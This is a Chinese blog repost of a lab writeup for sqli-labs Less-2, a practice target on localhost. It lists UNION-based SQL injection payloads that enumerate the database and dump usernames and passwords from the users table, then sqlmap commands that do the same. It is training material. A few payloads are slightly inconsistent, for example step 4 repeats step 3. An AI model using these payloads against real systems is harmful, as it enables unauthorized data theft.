2. 程式人生 > 實用技巧 >Sqli-labs 第2關 SQL注入 Writeup

Sqli-labs 第2關 SQL注入 Writeup

阿新 發佈:2021-01-12

Sqli-labs 第2關 SQL注入 Writeup

關卡簡介

關卡提示:GET-Error based - Intiger based

注入位置:GET

注入型別:數字型

前期測試

union聯合查詢注入

由於有顯示資料庫內容的欄位區域,還有有報錯回顯示, 因此可用此方法

  1. 爆列

    http://127.0.0.1/Less-2/?id=1%27%20order%20by%201--+
http://127.0.0.1/Less-2/?id=1%27%20order%20by%202--+
http://127.0.0.1/Less-2/?id=1%27%20order%20by%203--+

    試過均正常顯示id=1時的頁面,當 http://127.0.0.1/Less-2/?id=-1 order by 4--+ 報錯,說明 當前資料表有3列

  2. 爆出資料庫版本 構造 payload http://127.0.0.1/Less-2/?id=-1 union select 1,2,(select version())--+

  3. 爆出資料庫資訊

    (所有) 構造 payload http://127.0.0.1/Less-2/?id=-1 union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+

  4. 爆出當前庫的所有表 構造 payload http://127.0.0.1/Less-2/?id=-1 union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+

  5. 爆出使用者表users的所有列名 構造 payload

    http://127.0.0.1/Less-2/?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="users")--+

  6. 爆出使用者表users的所有資訊 構造 payload http://127.0.0.1/Less-1/?id=-1 union select 1,2,(select group_concat(username,'~',password) from users)--+

利用sqlmap注入

傻瓜式注入

  1. 爆出所有庫 終端執行 sqlmap -u http://127.0.0.1/Less-2/?id=1 --dbs

  2. 爆出當前資料庫所有表 終端執行 sqlmap -u http://127.0.0.1/Less-2/?id=1 -D security --tables

  3. 爆出users表中所有列 終端執行 sqlmap -u http://127.0.0.1/Less-2/?id=1 -D security -T users --columns

  4. 爆出users表所有資訊 終端執行 sqlmap -u http://127.0.0.1/Less-2/?id=1 -D security -T users -C username,password --dump

相關推薦

Sqli-labs 2 SQL注入 Writeup

Sqli-labs 2 SQL注入 Writeup 關卡簡介 關卡提示:GET-Error based - Intiger based 注入位置:GET

Sqli-labs 3 SQL注入 Writeup

Sqli-labs 3 SQL注入 Writeup 關卡簡介 關卡提示:GET -Error based- Single quotes with twist- string

sqli-labs

1、首先判斷注入點 正常顯示是這樣的不正常顯示是這樣的猜到最後,注入點是字元型,單引號加兩個小括號,?id=1’)) – -因為它只有正常顯示和不正常顯示兩種狀態,並且也沒有MySQL的報錯資訊。正常來說,這

SQLi-LABS 第一 SQL注入 總結

SQLi-LABS 第一 SQL注入 總結 關卡簡介 關卡提示:GET-Error based- Single quotes-String 注入位置:GET

sqli-labs十八題

檢視題目 基於錯誤的請求頭注入 一個登入表單,顯示了ip地址。 測試一通毫無頭緒。。。看看原始碼

sqli-labs less32-37(寬位元組注入)

Bypass addslashes() Bypass addslashes() Bypass Add SLASHES addslashes() Bypass MySQL Real Escape String

xss-labs

老套路,有輸入框進行輸入隨意值檢視返回,然後在輸入xss注入語句。

xss-labs

有一個超連結,我們點進去看看 大概是把我們輸入框的值當成a標籤裡的href屬性進行跳轉,嘗試寫入百度能否跳轉成功。

xss-labs

一樣,超連結跳轉。 寫入偽協議進行嘗試 被轉義了,嘗試用的unicode編碼進行嘗試

sqli-labs(32-37)寬位元組注入

32 寬位元組-報錯注入 輸入?id=2\',發現引號被轉義了,沒有報錯 一般情況下,這裡是不存在SQL注入的,但有一個特殊情況,就是資料庫使用GBK編碼,可以用寬位元組注入

3屆83行程式碼大賽2賽題官方解析

簡介:由阿里云云效主辦的2021年3屆83行程式碼挑戰賽已經收官。超2萬人圍觀,近4000人蔘賽,85個團隊組團來戰。大賽採用遊戲闖玩兒法,融合元宇宙科幻和劇本殺元素,讓一眾開發者玩得不亦樂乎。

五篇 SQL注入基礎知識

1 什麼是SQL注入 一種將SQL語句插入到使用者輸入的引數中,進行攻擊,這些會通過後端伺服器傳入到SQL伺服器,執行對應的SQL語句,比如可以獲取資料庫資訊、使用者資訊、管理員許可權等

2:文字串裡單詞、數字和符號的識別

ps 注意tab鍵特判 任務描述 編寫一個lex描述檔案,識別出指定文字串裡的單詞、數字和符號(空格不作處理)。

Educoder JSP基礎之網站使用者管理 2:顯示具體使用者資訊

任務描述 本任務:完成ShowUserServlet類的編寫,實現對某個使用者具體使用者資訊的查詢與顯示。首先,需要從具體的http請求中獲取到指定的需要進行展示的使用者ID,然後,對該指定使用者進行資訊查詢和頁面展示。

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

sqli-labs第一:基於錯誤的GET單引號字元型注入

點進去題目:提示我們輸入題目id,第一題,所以我們輸入?id=1,回車即可。如圖:首先可以判斷這裡接受的是一個GET請求,先在1後面加一個’ 發現報錯,說明這裡沒有過濾掉引號,所以這裡是一個注入SQL注入

SQL注入之二次注入sql-lab24

什麼是二次注入 二次注入可以理解為,攻擊者構造的惡意資料儲存在資料庫後,惡意資料被讀取並進入到SQL查詢語句所導致的注入。防禦者可能在使用者 輸入惡意資料時對其中的特殊字元進行了轉義處理,但在惡意資

sqli-labs靶場十五

十五沒什麼特殊的,只是單引號閉合而已。

sqli-labs筆記-less2-數字型注入

開啟Less-2中index.php檔案,在32行$sql=\"SELECT * FROM users WHERE id=\'$id\' LIMIT 0,1\";後面新增如下兩行:

sqli-labs筆記-less38-53-堆疊注入

Stacked injections:堆疊注入。從名詞的含義就可以看到應該是一堆sql語句(多條)一起執行。而在真實的運用中也是這樣的,我們知道在mysql中,主要是命令列中,每一條語句結尾加 ; 表示語句結束。這樣我們就想到了是